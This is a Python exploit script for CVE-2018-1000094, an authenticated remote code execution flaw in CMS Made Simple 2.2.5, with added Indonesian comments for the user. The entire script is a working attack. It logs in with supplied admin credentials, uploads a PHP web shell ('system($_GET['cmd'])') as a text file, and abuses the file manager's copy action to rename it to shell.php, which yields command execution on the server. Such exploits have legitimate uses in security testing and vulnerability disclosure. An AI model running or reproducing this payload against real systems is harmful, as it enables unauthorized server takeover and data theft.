exploit_rce_cms_made_simplev2-2-5.py

1. # Exploit Title: CMS Made Simple 2.2.5 authenticated Remote Code Execution
2. # Date: 3rd of July, 2018
3. # Exploit Author: Mustafa Hasan (@strukt93)
4. # Vendor Homepage: http://www.cmsmadesimple.org/
5. # Software Link: http://www.cmsmadesimple.org/downloads/cmsms/
6. # Version: 2.2.5
7. # CVE: CVE-2018-1000094
8.  
9. import requests
10. import base64
11.  
12. base_url = "http://192.168.1.3/cmssm/admin" # Rubah link dengan link admin
13. upload_dir = "/uploads"
14. upload_url = base_url.split('/admin')[0] + upload_dir
15. username = "root" # isi username valid
16. password = "20002000" # isi password valid
17.  
18. csrf_param = "_sk_"
19. txt_filename = 'cmsmsrce.txt'
20. php_filename = 'shell.php'
21. payload = "<?php system($_GET['cmd']);?>"
22.  
23. def parse_csrf_token(location):
24.     print "[+] String that is being split: " + location # parameter ini untuk mengecek parameter token yang digunakan web tersebut
25.     return location.split(csrf_param + "=")[1]
26.  
27. def authenticate():
28.     page = "/login.php"
29.     url = base_url + page
30.     data = {
31.         "username": username,
32.         "password": password,
33.         "loginsubmit": "Submit"
34.     }
35.     response  = requests.post(url, data=data, allow_redirects=False) # tambahkan ( , verify=False) jika web menggunakan https
36.     status_code = response.status_code
37.     if status_code == 302:
38.         print "[+] Authenticated successfully with the supplied credentials"
39.         return response.cookies, parse_csrf_token(response.headers['Location'])
40.     print "[-] Authentication failed"
41.     return None, None
42.  
43. def upload_txt(cookies, csrf_token):
44.     mact = "FileManager,m1_,upload,0"
45.     page = "/moduleinterface.php"
46.     url = base_url + page
47.     data = {
48.         "mact": mact,
49.         csrf_param: csrf_token,
50.         "disable_buffer": 1
51.     }
52.     txt = {
53.         'm1_files[]': (txt_filename, payload)
54.     }
55.     print "[*] Attempting to upload {}...".format(txt_filename)
56.     response = requests.post(url, data=data, files=txt, cookies=cookies) # tambahkan ( , verify=False) jika web menggunakan https
57.     status_code = response.status_code
58.     if status_code == 200:
59.         print "[+] Successfully uploaded {}".format(txt_filename)
60.         return True
61.     print "[-] An error occurred while uploading {}".format(txt_filename)
62.     return None
63.  
64. def copy_to_php(cookies, csrf_token):
65.     mact = "FileManager,m1_,fileaction,0"
66.     page = "/moduleinterface.php"
67.     url = base_url + page
68.     b64 = base64.b64encode(txt_filename)
69.     serialized = 'a:1:{{i:0;s:{}:"{}";}}'.format(len(b64), b64)
70.     data = {
71.         "mact": mact,
72.         csrf_param: csrf_token,
73.         "m1_fileactioncopy": "",
74.         "m1_path": upload_dir,
75.         "m1_selall": serialized,
76.         "m1_destdir": "/",
77.         "m1_destname": php_filename,
78.         "m1_submit": "Copy"
79.     }
80.     print "[*] Attempting to copy {} to {}...".format(txt_filename, php_filename)
81.     response = requests.post(url, data=data, cookies=cookies, allow_redirects=False) # tambahkan ( , verify=False) jika web menggunakan https
82.     status_code = response.status_code
83.     if status_code == 302:
84.         if response.headers['Location'].endswith('copysuccess'):
85.             print "[+] File copied successfully"
86.             return True
87.     print "[-] An error occurred while copying, maybe {} already exists".format(php_filename)
88.     return None    
89.  
90. def quit():
91.     print "[-] Exploit failed"
92.     exit()
93.  
94. def run():
95.     cookies,csrf_token = authenticate()
96.     if not cookies:
97.         quit()
98.     if not upload_txt(cookies, csrf_token):
99.         quit()
100.     if not copy_to_php(cookies, csrf_token):
101.         quit()
102.     print "[+] Exploit succeeded, shell can be found at: {}".format(upload_url + '/' + php_filename)
103.  
104. run()